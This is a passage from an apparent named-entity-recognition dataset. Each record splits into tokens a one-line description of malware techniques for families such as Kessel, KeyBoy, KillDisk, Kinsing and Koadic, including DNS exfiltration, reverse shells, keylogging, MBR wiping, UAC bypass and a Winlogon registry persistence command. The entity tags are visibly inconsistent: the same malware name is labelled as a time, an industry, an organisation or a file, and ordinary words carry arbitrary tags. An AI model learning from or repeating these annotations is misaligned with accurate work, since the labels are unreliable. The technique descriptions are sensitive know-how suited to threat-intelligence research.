"can", - "RC4-encrypt", - "credentials", - "before", - "sending", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "can", - "create", - "a", - "reverse", - "shell", - "between", - "the", - "infected", - "host", - "and", - "a", - "specified", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "maliciously", - "altered", - "the", - "OpenSSH", - "binary", - "on", - "targeted", - "systems", - "to", - "create", - "a", - "backdoor." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "can", - "split", - "the", - "data", - "to", - "be", - "exilftrated", - "into", - "chunks", - "that", - "will", - "fit", - "in", - "subdomains", - "of", - "DNS", - "queries." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "decrypted", - "the", - "binary's", - "configuration", - "once", - "the", - "<code>main</code>", - "function", - "was", - "launched." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel's", - "configuration", - "is", - "hardcoded", - "and", - "RC4", - "encrypted", - "within", - "the", - "binary." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "exfiltrated", - "information", - "gathered", - "from", - "the", - "infected", - "system", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "can", - "exfiltrate", - "credentials", - "and", - "other", - "information", - "via", - "HTTP", - "POST", - "request,", - "TCP,", - "and", - "DNS." - ], - "ner_tags": [ - "B-Time", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kessel", - "can", - "download", - "additional", - "modules", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "trojanized", - "the", - "<sode>ssh_login</code>", - "and", - "<code>user-auth_pubkey</code>", - "functions", - "to", - "steal", - "plaintext", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Kessel", - "can", - "use", - "a", - "proxy", - "during", - "exfiltration", - "if", - "set", - "in", - "the", - "configuration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "exfiltrated", - "data", - "via", - "hexadecimal-encoded", - "subdomain", - "fields", - "of", - "DNS", - "queries." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "collected", - "the", - "system", - "architecture,", - "OS", - "version,", - "and", - "MAC", - "address", - "information." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - "has", - "collected", - "the", - "DNS", - "address", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Variants", - "of", - "Kevin", - "can", - "communicate", - "over", - "DNS", - "through", - "queries", - "to", - "the", - "server", - "for", - "constructed", - "domain", - "names", - "with", - "embedded", - "information." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "create", - "directories", - "to", - "store", - "logs", - "and", - "other", - "collected", - "data." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "exfiltrate", - "data", - "to", - "the", - "C2", - "server", - "in", - "27-character", - "chunks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "upload", - "logs", - "and", - "other", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "has", - "Base64-encoded", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "send", - "data", - "from", - "the", - "victim", - "host", - "through", - "a", - "DNS", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "assign", - "hard-coded", - "fallback", - "domains", - "for", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "delete", - "files", - "created", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "hide", - "the", - "current", - "window", - "from", - "the", - "targeted", - "user", - "via", - "the", - "`ShowWindow`", - "API", - "function." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "download", - "files", - "to", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "generate", - "a", - "sequence", - "of", - "dummy", - "HTTP", - "C2", - "requests", - "to", - "obscure", - "traffic." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "use", - "the", - "`ShowWindow`", - "API", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "use", - "a", - "custom", - "protocol", - "tunneled", - "through", - "DNS", - "or", - "HTTP." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kevin", - "has", - "renamed", - "an", - "image", - "of", - "`cmd.exe`", - "with", - "a", - "random", - "name", - "followed", - "by", - "a", - "`.tmpl`", - "extension." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "Base32", - "encode", - "chunks", - "of", - "output", - "files", - "during", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "enumerate", - "the", - "OS", - "version", - "and", - "hostname", - "of", - "a", - "targeted", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "collect", - "the", - "MAC", - "address", - "and", - "other", - "information", - "from", - "a", - "victim", - "machine", - "using", - "`ipconfig/all`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "sleep", - "for", - "a", - "time", - "interval", - "between", - "C2", - "communication", - "attempts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Variants", - "of", - "Kevin", - "can", - "communicate", - "with", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "use", - "a", - "renamed", - "image", - "of", - "`cmd.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Kevin", - "can", - "compile", - "randomly-generated", - "MOF", - "files", - "into", - "the", - "WMI", - "repository", - "to", - "persistently", - "run", - "malware." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "attempts", - "to", - "collect", - "passwords", - "from", - "browsers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "uses", - "the", - "Dynamic", - "Data", - "Exchange", - "(DDE)", - "protocol", - "to", - "download", - "remote", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "one", - "version", - "of", - "KeyBoy,", - "string", - "obfuscation", - "routines", - "were", - "used", - "to", - "hide", - "many", - "of", - "the", - "critical", - "values", - "referenced", - "in", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "has", - "a", - "command", - "to", - "launch", - "a", - "file", - "browser", - "or", - "explorer", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "uses", - "<code>-w", - "Hidden</code>", - "to", - "conceal", - "a", - "PowerShell", - "window", - "that", - "downloads", - "a", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "has", - "a", - "download", - "and", - "upload", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "installs", - "a", - "keylogger", - "for", - "intercepting", - "credentials", - "and", - "keystrokes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "uses", - "PowerShell", - "commands", - "to", - "download", - "and", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "KeyBoy", - "uses", - "custom", - "SSL", - "libraries", - "to", - "impersonate", - "SSL", - "in", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "uses", - "Python", - "scripts", - "for", - "installing", - "files", - "and", - "performing", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "KeyBoy", - "has", - "a", - "command", - "to", - "perform", - "screen", - "grabbing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "can", - "gather", - "extended", - "system", - "information,", - "such", - "as", - "information", - "about", - "the", - "operating", - "system,", - "disks,", - "and", - "memory." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "can", - "determine", - "the", - "public", - "or", - "WAN", - "IP", - "address", - "for", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "time-stomped", - "its", - "DLL", - "in", - "order", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "uses", - "VBS", - "scripts", - "for", - "installing", - "files", - "and", - "performing", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "KeyBoy", - "can", - "launch", - "interactive", - "shells", - "for", - "communicating", - "with", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "installs", - "a", - "service", - "pointing", - "to", - "a", - "malicious", - "DLL", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KeyBoy", - "issues", - "the", - "command", - "<code>reg", - "add", - "“HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon”</code>", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "prompts", - "the", - "users", - "for", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "uses", - "a", - "Launch", - "Agent", - "to", - "persist." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "uses", - "a", - "copy", - "of", - "tor2web", - "proxy", - "for", - "HTTPS", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "uses", - "Python", - "for", - "scripting", - "to", - "execute", - "additional", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "uses", - "a", - "resource", - "fork", - "to", - "present", - "a", - "macOS", - "JPEG", - "or", - "text", - "file", - "icon", - "rather", - "than", - "the", - "executable's", - "icon", - "assigned", - "by", - "the", - "operating", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "uses", - "the", - "keychaindump", - "project", - "to", - "read", - "securityd", - "memory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "adds", - "the", - "setuid", - "flag", - "to", - "a", - "binary", - "so", - "it", - "can", - "easily", - "elevate", - "in", - "the", - "future." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "puts", - "a", - "space", - "after", - "a", - "false", - ".jpg", - "extension", - "so", - "that", - "execution", - "actually", - "goes", - "through", - "the", - "Terminal.app", - "program." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Keydnap", - "uses", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "has", - "attempted", - "to", - "get", - "the", - "access", - "token", - "of", - "a", - "process", - "by", - "calling", - "<code>OpenProcessToken</code>.", - "If", - "KillDisk", - "gets", - "the", - "access", - "token,", - "then", - "it", - "attempt", - "to", - "modify", - "the", - "token", - "privileges", - "with", - "<code>AdjustTokenPrivileges</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "deletes", - "Application,", - "Security,", - "Setup,", - "and", - "System", - "Windows", - "Event", - "Logs." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "deletes", - "system", - "files", - "to", - "make", - "the", - "OS", - "unbootable.", - "KillDisk", - "also", - "targets", - "and", - "deletes", - "files", - "with", - "35", - "different", - "file", - "extensions." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "has", - "a", - "ransomware", - "component", - "that", - "encrypts", - "files", - "with", - "an", - "AES", - "key", - "that", - "is", - "also", - "RSA-1028", - "encrypted." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "overwrites", - "the", - "first", - "sector", - "of", - "the", - "Master", - "Boot", - "Record", - "with", - "“0x00”." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "has", - "the", - "ability", - "to", - "quit", - "and", - "delete", - "itself." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "has", - "used", - "the", - "<code>FindNextFile</code>", - "command", - "as", - "part", - "of", - "its", - "file", - "deletion", - "process." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "registers", - "as", - "a", - "service", - "under", - "the", - "Plug-And-Play", - "Support", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "has", - "called", - "the", - "Windows", - "API", - "to", - "retrieve", - "the", - "hard", - "disk", - "handle", - "and", - "shut", - "down", - "the", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "uses", - "VMProtect", - "to", - "make", - "reverse", - "engineering", - "the", - "malware", - "more", - "difficult." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "has", - "called", - "<code>GetCurrentProcess</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "KillDisk", - "terminates", - "various", - "processes", - "to", - "get", - "the", - "user", - "to", - "reboot", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "loads", - "and", - "executes", - "functions", - "from", - "a", - "DLL." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "retrieves", - "the", - "hard", - "disk", - "name", - "by", - "calling", - "the", - "<code>CreateFileA", - "to", - "\\\\.\\PHYSICALDRIVE0</code>", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KillDisk", - "attempts", - "to", - "reboot", - "the", - "machine", - "by", - "terminating", - "specific", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "searched", - "<code>bash_history</code>", - "for", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "attempted", - "to", - "brute", - "force", - "hosts", - "over", - "SSH." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kinsing", - "was", - "executed", - "with", - "an", - "Ubuntu", - "container", - "entry", - "point", - "that", - "runs", - "shell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "crontab", - "to", - "download", - "and", - "run", - "shell", - "scripts", - "every", - "minute", - "to", - "ensure", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "was", - "run", - "through", - "a", - "deployed", - "Ubuntu", - "container." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Kinsing", - "was", - "executed", - "in", - "an", - "Ubuntu", - "container", - "deployed", - "via", - "an", - "open", - "Docker", - "daemon", - "API." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "the", - "find", - "command", - "to", - "search", - "for", - "specific", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "downloaded", - "additional", - "lateral", - "movement", - "scripts", - "from", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "chmod", - "to", - "modify", - "permissions", - "on", - "key", - "files", - "for", - "use." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "searched", - "for", - "private", - "keys." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "ps", - "to", - "list", - "processes." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "a", - "script", - "to", - "parse", - "files", - "like", - "<code>/etc/hosts</code>", - "and", - "SSH", - "<code>known_hosts</code>", - "to", - "discover", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "created", - "and", - "run", - "a", - "Bitcoin", - "cryptocurrency", - "miner." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "SSH", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "Unix", - "shell", - "scripts", - "to", - "execute", - "commands", - "in", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "used", - "valid", - "SSH", - "credentials", - "to", - "access", - "remote", - "hosts." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kinsing", - "has", - "communicated", - "with", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "uninstall", - "malware", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "list", - "drives", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "conceal", - "its", - "activity", - "through", - "hiding", - "active", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "initiate", - "keylogging", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "remotely", - "trigger", - "keyboard", - "input", - "and", - "mouse", - "clicks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Kivars", - "has", - "the", - "ability", - "to", - "capture", - "screenshots", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "use", - "SSL", - "and", - "TLS", - "for", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Koadic", - "has", - "2", - "methods", - "for", - "elevating", - "integrity.", - "It", - "can", - "bypass", - "UAC", - "through", - "`eventvwr.exe`", - "and", - "`sdclt.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Koadic", - "can", - "retrieve", - "the", - "current", - "content", - "of", - "the", - "user", - "clipboard." - ], - "ner_tags": 